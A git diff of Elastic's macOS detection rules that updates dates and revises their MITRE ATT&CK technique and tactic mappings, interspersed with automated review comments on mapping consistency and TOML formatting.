 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/macos/defense_evasion_safari_config_change.toml b/rules/macos/defense_evasion_safari_config_change.toml
index 4a35cd07257..10e852e4536 100644
--- a/rules/macos/defense_evasion_safari_config_change.toml
+++ b/rules/macos/defense_evasion_safari_config_change.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/14"
 integration = ["endpoint"]
 matur
 maturity = "production"
-updated_date = "2026/02/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
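Review bot: Both existing `[[rule.threat]]` entries in this hunk keep `T1548` / `Abuse Elevation Control Mechanism` without a subtechnique, while the other TCC and full-disk-access rules touched by this same patch (defense_evasion_privacy_controls_tcc_database_modification.toml, defense_evasion_suspicious_tcc_access_granted.toml, discovery_full_disk_access_check.toml) map the more specific `T1548.006` / `TCC Manipulation`. Given that this rule concerns granting sshd full disk access via the privacy preferences, the same `[[rule.threat.technique.subtechnique]]` table under both the `TA0005` and `TA0004` entries would keep the mapping consistent across the set. That is a content judgement the rule author should confirm against the query, which is outside this hunk.
```toml
# … unchanged: [[rule.threat]] entry and its T1548 technique table …
reference = "https://attack.mitre.org/techniques/T1548/"

[[rule.threat.technique.subtechnique]]
id = "T1548.006"
name = "TCC Manipulation"
reference = "https://attack.mitre.org/techniques/T1548/006/"

[rule.threat.tactic]
# … unchanged: TA0005 tactic table; repeat the subtechnique table in the TA0004 entry …
```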
@@ -100,19 +100,23 @@ The 'defaults' command in macOS is a utility that allows users to read, write, a
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
-
+[[rule.threat.technique]]
+id = "T1647"
+name = "Plist File Modification"
+reference = "https://attack.mitre.org/techniques/T1647/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml
index 308e0584ee7..7ba87ae52c0 100644
--- a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml
+++ b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/11"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -101,14 +101,23 @@ Microsoft Office applications on macOS operate within a sandbox to limit potenti
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1036"
+name = "Masquerading"
+reference = "https://attack.mitre.org/techniques/T1036/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1036.005"
+name = "Match Legitimate Resource Name or Location"
+reference = "https://attack.mitre.org/techniques/T1036/005/"
+
 [[rule.threat.technique]]
 id = "T1497"
 name = "Virtualization/Sandbox Evasion"
 reference = "https://attack.mitre.org/techniques/T1497/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml
index 03d0581f379..70b84cd9768 100644
--- a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml
+++ b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/30"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/02/03"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -85,30 +85,48 @@ FROM logs-endpoint.events.*
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
- [[rule.threat.technique]]
- name = "Abuse Elevation Control Mechanism"
- id = "T1548"
- reference = "https://attack.mitre.org/techniques/T1548/"
+[[rule.threat.technique.subtechnique]]
+id = "T1548.006"
+name = "TCC Manipulation"
+reference = "https://attack.mitre.org/techniques/T1548/006/"
- [[rule.threat.technique.subtechnique]]
- name = "TCC Manipulation"
- id = "T1548.006"
- reference = "https://attack.mitre.org/techniques/T1548/006/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Collection"
- id = "TA0009"
- reference = "https://attack.mitre.org/tactics/TA0009/"
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
- [[rule.threat.technique]]
- name = "Data from Local System"
- id = "T1005"
- reference = "https://attack.mitre.org/techniques/T1005/"
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1548.006"
+name = "TCC Manipulation"
+reference = "https://attack.mitre.org/techniques/T1548/006/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml b/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml
index 78f98ad6975..bb9e3a4e69b 100644
--- a/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml
+++ b/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/01/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -98,14 +98,26 @@ Apple's TCC framework safeguards user data by controlling app access to sensitiv
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1006"
 name = "Direct Volume Access"
 reference = "https://attack.mitre.org/techniques/T1006/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/macos/discovery_full_disk_access_check.toml b/rules/macos/discovery_full_disk_access_check.toml
index 58b259b52dd..1bd5142d126 100644
--- a/rules/macos/discovery_full_disk_access_check.toml
+++ b/rules/macos/discovery_full_disk_access_check.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/30"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -72,30 +72,48 @@ file where host.os.type == "macos" and event.action == "open" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Discovery"
- id = "TA0007"
- reference = "https://attack.mitre.org/tactics/TA0007/"
+[[rule.threat.technique]]
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
- [[rule.threat.technique]]
- name = "File and Directory Discovery"
- id = "T1083"
- reference = "https://attack.mitre.org/techniques/T1083/"
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
- [[rule.threat.technique]]
- name = "Abuse Elevation Control Mechanism"
- id = "T1548"
- reference = "https://attack.mitre.org/techniques/T1548/"
+[[rule.threat.technique.subtechnique]]
+id = "T1548.006"
+name = "TCC Manipulation"
+reference = "https://attack.mitre.org/techniques/T1548/006/"
- [[rule.threat.technique.subtechnique]]
- name = "TCC Manipulation"
- id = "T1548.006"
- reference = "https://attack.mitre.org/techniques/T1548/006/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1548.006"
+name = "TCC Manipulation"
+reference = "https://attack.mitre.org/techniques/T1548/006/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/macos/discovery_suspicious_sip_check.toml b/rules/macos/discovery_suspicious_sip_check.toml
index cf48e7fe8b7..19b49d3f620 100644
--- a/rules/macos/discovery_suspicious_sip_check.toml
+++ b/rules/macos/discovery_suspicious_sip_check.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/30"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -74,22 +74,40 @@ process where host.os.type == "macos" and event.type == "start" and event.action
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Discovery"
- id = "TA0007"
- reference = "https://attack.mitre.org/tactics/TA0007/"
-
- [[rule.threat.technique]]
- name = "System Information Discovery"
- id = "T1082"
- reference = "https://attack.mitre.org/techniques/T1082/"
-
- [[rule.threat.technique]]
- name = "Virtualization/Sandbox Evasion"
- id = "T1497"
- reference = "https://attack.mitre.org/techniques/T1497/"
-
- [[rule.threat.technique.subtechnique]]
- name = "System Checks"
- id = "T1497.001"
- reference = "https://attack.mitre.org/techniques/T1497/001/"
+[[rule.threat.technique]]
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
+
+[[rule.threat.technique]]
+id = "T1497"
+name = "Virtualization/Sandbox Evasion"
+reference = "https://attack.mitre.org/techniques/T1497/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1497.001"
+name = "System Checks"
+reference = "https://attack.mitre.org/techniques/T1497/001/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1497"
+name = "Virtualization/Sandbox Evasion"
+reference = "https://attack.mitre.org/techniques/T1497/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1497.001"
+name = "System Checks"
+reference = "https://attack.mitre.org/techniques/T1497/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/macos/discovery_system_and_network_configuration_check.toml b/rules/macos/discovery_system_and_network_configuration_check.toml
index 05dfd0e7ded..4e55e3ad844 100644
--- a/rules/macos/discovery_system_and_network_configuration_check.toml
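Review bot: The new Defense Evasion entry (`id = "TA0005"`) is only consistent with the rest of the rule if the `tags` array in the `[rule]` table — above this hunk — also carries `Tactic: Defense Evasion`; that line is not in view, so it should be checked before merge rather than assumed. Listing T1497 / T1497.001 under both Discovery and Defense Evasion is correct, since ATT&CK places Virtualization/Sandbox Evasion under both tactics, and duplicating a technique across tactic entries is the accepted way to express that.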
+++ b/rules/macos/discovery_system_and_network_configuration_check.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/30"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -71,17 +71,17 @@ file where host.os.type == "macos" and event.action == "open" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Discovery"
- id = "TA0007"
- reference = "https://attack.mitre.org/tactics/TA0007/"
+[[rule.threat.technique]]
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
- [[rule.threat.technique]]
- name = "System Information Discovery"
- id = "T1082"
- reference = "https://attack.mitre.org/techniques/T1082/"
+[[rule.threat.technique]]
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
- [[rule.threat.technique]]
- name = "System Network Configuration Discovery"
- id = "T1016"
- reference = "https://attack.mitre.org/techniques/T1016/"
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/macos/discovery_users_domain_built_in_commands.toml b/rules/macos/discovery_users_domain_built_in_commands.toml
index 6720bc025b4..d8b8d169b92 100644
--- a/rules/macos/discovery_users_domain_built_in_commands.toml
+++ b/rules/macos/discovery_users_domain_built_in_commands.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/12"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -105,29 +105,38 @@ Built-in macOS commands like `ldapsearch`, `dsmemberutil`, and `dscl` are essent
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1069"
 name = "Permission Groups Discovery"
 reference = "https://attack.mitre.org/techniques/T1069/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1069.001"
 name = "Local Groups"
 reference = "https://attack.mitre.org/techniques/T1069/001/"
+[[rule.threat.technique.subtechnique]]
+id = "T1069.002"
+name = "Domain Groups"
+reference = "https://attack.mitre.org/techniques/T1069/002/"
 [[rule.threat.technique]]
 id = "T1087"
 name = "Account Discovery"
 reference = "https://attack.mitre.org/techniques/T1087/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1087.001"
 name = "Local Account"
 reference = "https://attack.mitre.org/techniques/T1087/001/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1087.002"
+name = "Domain Account"
+reference = "https://attack.mitre.org/techniques/T1087/002/"
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
diff --git a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml
index 6ec5857b809..6ac080940fa 100644
--- a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml
+++ b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/01/07"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
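Review bot: The separator blank lines in this hunk are inconsistent: a `+` blank is added before the `[[rule.threat.technique.subtechnique]]` tables for T1069.001 and T1087.001, but none precedes the new `T1069.002` and `T1087.002` tables, and no blank line is left before `[rule.threat.tactic]`. TOML does not care, but the other rule files in this patch keep one blank line between tables, so I would add the three missing `+` blank lines (before each new `[[rule.threat.technique.subtechnique]]` table and before `[rule.threat.tactic]`). If this layout is what the project's TOML writer emits, the fix belongs in the writer rather than in this file.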
@@ -103,26 +103,31 @@ Electron applications, built on Node.js, can execute child processes using the `
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.007"
+name = "JavaScript"
+reference = "https://attack.mitre.org/techniques/T1059/007/"
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml
index 3280689d092..e15e1221599 100644
--- a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml
+++ b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/23"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -106,26 +106,64 @@ Web browsers are integral to user interaction with the internet, often serving a
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.002"
+name = "AppleScript"
+reference = "https://attack.mitre.org/techniques/T1059/002/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
 [[rule.threat.technique]]
 id = "T1203"
 name = "Exploitation for Client Execution"
 reference = "https://attack.mitre.org/techniques/T1203/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1189"
 name = "Drive-by Compromise"
 reference = "https://attack.mitre.org/techniques/T1189/"
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/macos/execution_installer_package_spawned_network_event.toml b/rules/macos/execution_installer_package_spawned_network_event.toml
index f54b8347f48..3b70f10fc01 100644
--- a/rules/macos/execution_installer_package_spawned_network_event.toml
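Review bot: `id = "T1059.001"` / `name = "PowerShell"` is added under Command and Scripting Interpreter for a rule in `rules/macos/`; it is only accurate if the child-process list in the query above this hunk matches `pwsh`, otherwise it overstates coverage on ATT&CK maps. If `pwsh` is not in the query, drop the four-line `[[rule.threat.technique.subtechnique]]` table for T1059.001. The new Command and Control entry (T1105, Ingress Tool Transfer) is likewise an inference about what a browser-spawned process does next rather than something a process-start rule observes; consider whether it belongs here or on the follow-on network rule.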
+++ b/rules/macos/execution_installer_package_spawned_network_event.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/02/23"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/04/21"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -112,36 +112,56 @@ MacOS installer packages, often with a .pkg extension, are used to distribute so
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.002"
+name = "AppleScript"
+reference = "https://attack.mitre.org/techniques/T1059/002/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.007"
 name = "JavaScript"
 reference = "https://attack.mitre.org/techniques/T1059/007/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1071"
 name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1071.001"
 name = "Web Protocols"
 reference = "https://attack.mitre.org/techniques/T1071/001/"
-
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
diff --git a/rules/macos/execution_python_shell_spawn_first_occurrence.toml b/rules/macos/execution_python_shell_spawn_first_occurrence.toml
index 6da50e09b03..1e674eb9dd0 100644
--- a/rules/macos/execution_python_shell_spawn_first_occurrence.toml
+++ b/rules/macos/execution_python_shell_spawn_first_occurrence.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/23"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/02/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -76,10 +76,17 @@ not process.command_line:(*pip* or *conda* or *brew* or *jupyter*)
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.006"
 name = "Python"
@@ -89,7 +96,6 @@ reference = "https://attack.mitre.org/techniques/T1059/006/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id", "process.parent.executable"]
diff --git a/rules/macos/execution_script_via_automator_workflows.toml b/rules/macos/execution_script_via_automator_workflows.toml
index a5320a95420..e0a473b5ca8 100644
--- a/rules/macos/execution_script_via_automator_workflows.toml
+++ b/rules/macos/execution_script_via_automator_workflows.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/23"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -97,14 +97,18 @@ Automator, a macOS utility, allows users to automate repetitive tasks through wo
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.007"
+name = "JavaScript"
+reference = "https://attack.mitre.org/techniques/T1059/007/"
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml
index f657656b65c..c8652253c2e 100644
--- a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml
+++ b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/07"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -108,31 +108,36 @@ AppleScript, a scripting language for macOS, automates tasks by controlling appl
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.002"
 name = "AppleScript"
 reference = "https://attack.mitre.org/techniques/T1059/002/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1071"
+name = "Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1071/"
+
 [[rule.threat.technique]]
 id = "T1105"
 name = "Ingress Tool Transfer"
 reference = "https://attack.mitre.org/techniques/T1105/"
-
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
diff --git a/rules/macos/execution_shell_execution_via_apple_scripting.toml b/rules/macos/execution_shell_execution_via_apple_scripting.toml
index 03218b38b18..3c9e5a49850 100644
--- a/rules/macos/execution_shell_execution_via_apple_scripting.toml
+++ b/rules/macos/execution_shell_execution_via_apple_scripting.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/07"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -101,14 +101,23 @@ AppleScript and JXA are scripting languages used in macOS to automate tasks and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.002"
+name = "AppleScript"
+reference = "https://attack.mitre.org/techniques/T1059/002/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules/macos/execution_unusual_library_load_via_python.toml b/rules/macos/execution_unusual_library_load_via_python.toml
index 99c96e54eed..74c7555e5d1 100644
--- a/rules/macos/execution_unusual_library_load_via_python.toml
+++ b/rules/macos/execution_unusual_library_load_via_python.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/30"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/01/30"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -82,17 +82,22 @@ library where host.os.type == "macos" and event.action == "load" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
- [[rule.threat.technique]]
- name = "Command and Scripting Interpreter"
- id = "T1059"
- reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
- [[rule.threat.technique.subtechnique]]
- name = "Python"
- id = "T1059.006"
- reference = "https://attack.mitre.org/techniques/T1059/006/"
+[[rule.threat.technique]]
+id = "T1129"
+name = "Shared Modules"
+reference = "https://attack.mitre.org/techniques/T1129/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml
index b89f017f619..e7f5358d96b 100644
--- a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml
+++ b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/02/04"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -164,19 +164,61 @@ Microsoft Office applications on macOS can be exploited by adversaries to execut
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1566"
 name = "Phishing"
 reference = "https://attack.mitre.org/techniques/T1566/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1566.001"
 name = "Spearphishing Attachment"
